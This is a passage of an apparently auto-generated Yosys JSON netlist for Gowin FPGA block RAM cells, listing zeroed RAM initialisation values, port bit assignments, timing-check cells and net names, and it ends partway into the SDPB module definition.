"INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ] + }, + "DI": { + "direction": "input", + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 66, 67, 68 ] + }, + "ADA": { + "direction": "input", + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ] + }, + "ADB": { + "direction": "input", + "bits": [ 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 ] + }, + "WREA": { + "direction": "input", + "bits": [ 97 ] + }, + "WREB": { + "direction": "input", + "bits": [ 98 ] + }, + "CLKA": { + "direction": "input", + "bits": [ 99 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 100 ] + }, + "CEA": { + "direction": "input", + "bits": [ 101 ] + }, + "CEB": { + "direction": "input", + "bits": [ 102 ] + }, + "OCE": { + "direction": "input", + "bits": [ 103 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 104 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 105 ] + } + }, + "cells": { + "$specify$181": { + "hide_name": 1, + "type": "$specify3", + "parameters": { + "DAT_DST_PEN": "0", + "DAT_DST_POL": "0", + "DST_WIDTH": "00000000000000000000000000100000", + "EDGE_EN": "1", + "EDGE_POL": "1", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000111101101", + "T_FALL_MIN": "00000000000000000000000111101101", + "T_FALL_TYP": "00000000000000000000000111101101", + "T_RISE_MAX": "00000000000000000000000110100011", + "T_RISE_MIN": "00000000000000000000000110100011", + "T_RISE_TYP": "00000000000000000000000110100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1521.2-1521.43" + }, + "port_directions": { + "DAT": "input", + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DAT": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "DST": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "EN": [ "1" ], + "SRC": [ 100 ] + } + }, + "$specify$182": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1522.2-1522.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 104 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$183": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1523.2-1523.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 105 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$184": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1524.2-1524.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 103 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$185": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1525.2-1525.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 101 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$186": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1526.2-1526.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 102 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$187": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1527.2-1527.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 103 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$188": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1528.2-1528.33" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 97 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$189": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1529.2-1529.33" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 98 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$190": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000100000", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1530.2-1530.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$191": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000001110", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1531.2-1531.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$192": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000001110", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1532.2-1532.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 100 ], + "DST_EN": [ "1" ], + "SRC": [ 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$193": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000011", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1533.2-1533.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 99 ], + "DST_EN": [ "1" ], + "SRC": [ 66, 67, 68 ], + "SRC_EN": [ "1" ] + } + } + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1513.14-1513.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1513.19-1513.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1512.13-1512.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 101 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1516.7-1516.10" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 102 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1516.12-1516.15" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 99 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1515.7-1515.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 100 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1515.13-1515.17" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1511.14-1511.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1510.15-1510.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 103 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1517.7-1517.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 104 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1518.7-1518.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 105 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1518.15-1518.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 97 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1514.7-1514.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 98 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1514.13-1514.17" + } + } + } + }, + "SDPB": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:822.1-900.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100000", + "BIT_WIDTH_1": "00000000000000000000000000100000", + "BLK_SEL_0": "000", + "BLK_SEL_1": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": 